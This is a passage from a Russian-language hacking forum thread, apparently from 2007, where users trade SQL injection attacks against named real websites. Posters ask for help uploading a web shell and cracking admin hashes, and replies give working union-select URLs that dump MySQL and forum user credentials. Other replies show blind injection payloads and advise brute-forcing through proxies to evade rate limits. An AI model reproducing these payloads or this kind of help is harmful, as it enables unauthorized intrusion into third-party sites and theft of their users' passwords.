 |
|
19.09.2007, 11:56
|
|
Banned
Регистрация: 24.08.2007
Сообщений: 50
С нами:
9850241
Репутация:
16
|
|
если честно я не знаю просто знакомый попросил посмотреть я посмотрел нихера не понял... вот решил у вас поинтересоваться)))) вообщем так на первый взгляд ничего опасного нет??
|
|
|
19.09.2007, 13:55
|
|
Участник форума
Регистрация: 30.08.2006
Сообщений: 181
С нами:
10366322
Репутация:
45
|
|
Помогите залить шелл если это возможно.
Вот нашел давно такие скуль иньекции
http://www.berdyansk.net/pointer/links.php?part_id=-18+union+select+1,2,3,user,password,6+from+mysql.u ser/*
http://www.azovsintez.com/user/links.php?cond=-2+union+select+1,2,3,4,5/*
Сайты расположены на одном хостинге пароль к ftp расшифровать несмог. К некоторым владельцам сайтов есть пароль, но к незнаю где его вводить??? Еще там есть форум, может кто-то сможет доработать скуль чтоб вытащить хеш админа форума. |
|
|
|
19.09.2007, 14:42
|
|
Новичок
Регистрация: 16.09.2007
Сообщений: 25
С нами:
9816424
Репутация:
62
|
|
MegaBits, форумные
Код:
http://www.berdyansk.net/pointer/links.php?part_id=-18+union+select+1,2,3,pass,login,6+from+forum.users/*
|
|
|
|
20.09.2007, 06:12
|
|
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
С нами:
9875796
Репутация:
770
|
|
Проблема решена, с помощью наставления на путь истинный более опытными sql-injecter'ами. 
Всем, принявшим участие, выражаю огромную благодарность! |
|
|
|
20.09.2007, 18:37
|
|
Познавший АНТИЧАТ
Регистрация: 23.08.2007
Сообщений: 1,237
С нами:
9851426
Репутация:
1676
|
|
Помогите раскрутить скулю itsoft.ru/search/?search_query=1&in_cat=1'
|
|
|
|
20.09.2007, 18:58
|
|
Участник форума
Регистрация: 07.08.2007
Сообщений: 139
С нами:
9874372
Репутация:
138
|
|
Сообщение от Kaimi
Помогите раскрутить скулю itsoft.ru/search/?search_query=1&in_cat=1'
Пользователь урезан в правах. Делать нечего
|
|
|
|
20.09.2007, 19:26
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
С нами:
11217866
Репутация:
3812
|
|
http://itsoft.ru/search/?search_query=1&in_cat=hek%'+union+select +version()/*
version() = 4.1.14
user() = itcms_test@localhost
database() = itcms_test
http://itcms3.itsoft.ru/itcms/
^^
__________________
Последний раз редактировалось +toxa+; 20.09.2007 в 19:48..
|
|
|
|
26.09.2007, 19:49
|
|
Познающий
Регистрация: 06.08.2007
Сообщений: 85
С нами:
9875274
Репутация:
91
|
|
http://www.stalker-portal.ru/polls.php?id=1'
(Моя первая найденная скуля... Сразу говорю, вопросу ламерские, но для того и эта тема)
НУ так вот, число столбцов 6..
Однако по Полному ФАКу в разделе статьи в пункте "2.1.2 Определение выводимых столбцов" у меня стопор... Никакие "циферки" не высвечиваются 
http://www.stalker-portal.ru/polls.php?id=1' UNION SELECT 1,2,3,4,5,6 --/* -Вот собственно и оно
В общем наставьте меня на путь истинный... Хочется узнать, можно отсюда что выжать или нет(
Последний раз редактировалось SUBJECT617; 26.09.2007 в 20:23..
|
|
|
|
27.09.2007, 14:07
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
С нами:
10516826
Репутация:
3742
|
|
http://www.stalker-portal.ru/polls.php?id=1'%20or%20ascii(substring(user(),1,1) )>0/*
http://www.stalker-portal.ru/polls.php?id=1'%20or%20ascii(substring(user(),1,1) )<0/*
только там некая защита.. врубается на кол-во запросов в минуту, поэтому через проксики надо брутить все ))
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|
|
27.09.2007, 15:20
|
|
Познающий
Регистрация: 06.08.2007
Сообщений: 85
С нами:
9875274
Репутация:
91
|
|
Хмм, а эта защита случаем не на 200 секунд блочит? Я пытался просканить но меня забанили изза 'Hammering' на 200 секунд.
Такс, а где можно почитать про or ascii...? В факе этого нет...
Спс буду брутить) А как перейти на второй символ?
sm.. С символами разобрался, покачто не забанили... А ты сколько брутил то?) Как определить сколько символов? Точнее когда закончатся символы?
А как ты сделал так что он тебе показывает голосование при 1? ТАм на 1 и на 0 ничего нет в id
И еще... Пасс сгенеренный сто пороцентов... Как же я с регистром разберусь??
Последний раз редактировалось SUBJECT617; 27.09.2007 в 16:02..
Причина: Уж это лучше сотру)
|
|
|
|
|
|
|
|
Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)
|
|
|
|
Похожие темы
Линейный вид
